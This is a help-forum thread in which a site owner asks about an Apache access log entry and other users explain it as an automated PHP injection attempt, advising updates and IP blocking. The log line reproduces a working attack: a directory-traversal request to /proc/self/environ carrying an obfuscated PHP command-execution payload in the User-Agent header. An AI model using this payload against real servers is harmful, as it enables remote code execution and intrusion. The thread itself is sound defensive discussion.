[Webinar] Streamline your web hosting managementRegister Today

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 389
  • Last Modified:

Apache Log Files

Can anyone tell what this is doing??

./access.log.3:200.234.200.150 - - [28/Sep/2008:04:30:40 +0800] "GET /conference_proceedings/2005/forensics/includes/db_connect.php?baseDir=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 501 266 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;  $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
0
madstylex
Asked:
madstylex
2 Solutions
 
arober11Commented:
Hi, appears someone is attempting to hack your web server, via a php injection attack, the following will give you some more details:

http://packetstormsecurity.org/files/view/80068/shell-lfi.txt

0
 
mchkorgCommented:
Hi,
it might be a robot trying some known security holes randomly

Is this URL familiar to you? /conference_proceedings/2005/forensics.....
If yes, be sure the corresponding software is up to date.
If not, you don't care, it's trying old security holes I guess (2005)

*and*, you might want to block this IP 200.234.200.150 in your firewall if it bothers you too much

It seems to come from an infected computer in brazil, you might contact their "abuse" email contact abuse@locaweb.com.br
The IP points to hm1099.locaweb.com.br

regards
0
 
madstylexAuthor Commented:
not fully complete answer
0

Featured Post

The 14th Annual Expert Award Winners

The results are in! Meet the top members of our 2017 Expert Awards. Congratulations to all who qualified!

Tackle projects and never again get stuck behind a technical roadblock.
Join Now